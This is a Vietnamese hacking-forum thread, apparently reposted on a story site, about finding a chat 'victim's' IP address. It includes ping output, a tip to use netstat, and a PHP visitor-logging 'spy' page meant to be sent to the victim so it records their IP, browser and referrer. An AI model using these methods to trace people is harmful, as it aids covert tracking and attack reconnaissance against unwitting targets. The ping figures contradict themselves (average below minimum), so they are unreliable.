Ping statistics for 209.76.151.67:

Packets: Sent = 4, Received = 2, Lost = 2 (50% loss),

Approximate round trIP times in milli-seconds:

Minimum = 1185ms, Maximum = 1281ms, Average = 616ms

209.76.151.67 chính là IP mà chúng ta cần tìm của Victim dây.

Chúc các bạn thành công

Cách này mình đã test thử và phát hiện rất tốt IP của victim

Bạn nhớ khi chát với victim nên đóng tất các cửa sổ khác lại,như vậy sẽ chính xác hơn

trojon

Backdoor(VNISS)

sao lại phải 2 bước thế , dùng netstat-na có phải nhanh không. ka ka

không thì nhét cái trang này lên host, rồi gửi link cho victim là okiẹ

==================================

<html>

<head>

<title>Spy on yor site code by tapan21 of http://rpg.t28.net/ </title>

</head>

<table border="5" bg color="white">

<tr>

<td><center>

<body>

<?php

//--------------------------------

// Spy on your website! Logs in time, ip, the site you came from and browser!

// Created by: Tapan21 of http://rpg.t28.net

//--------------------------------

$spy = fopen("spy.html" , "a");

$site = $HTTP_REFERER;

$ip = $REMOTE_ADDR;

$browser = $HTTP_USER_AGENT;

$time = date("H:i dS F");

echo "The site you came from: " . $_SERVER["HTTP_REFERER"] . "

";

echo "ALL IP ADRESSES, TIME, SITE AND YOUR BROWSERS ARE BEING CAPTURED!";

fwrite($spy,"<<<<<------------BEGIN------------>>>>>

");

fwrite($spy,"Site you came from: $site

");

fwrite($spy,"IP Address: $ip

");

fwrite($spy,"Browser: $browser

");

fwrite($spy,"Time: $time

");

fwrite($spy,"<<<<<------------END------------>>>>>

");

fclose($spy);

?>

</table>

</center></td>

</tr>

</table border>

</body>

</html>

==================================

microlife(VNISS)

Bạn đang đọc truyện trên: Truyen4U.Pro

#science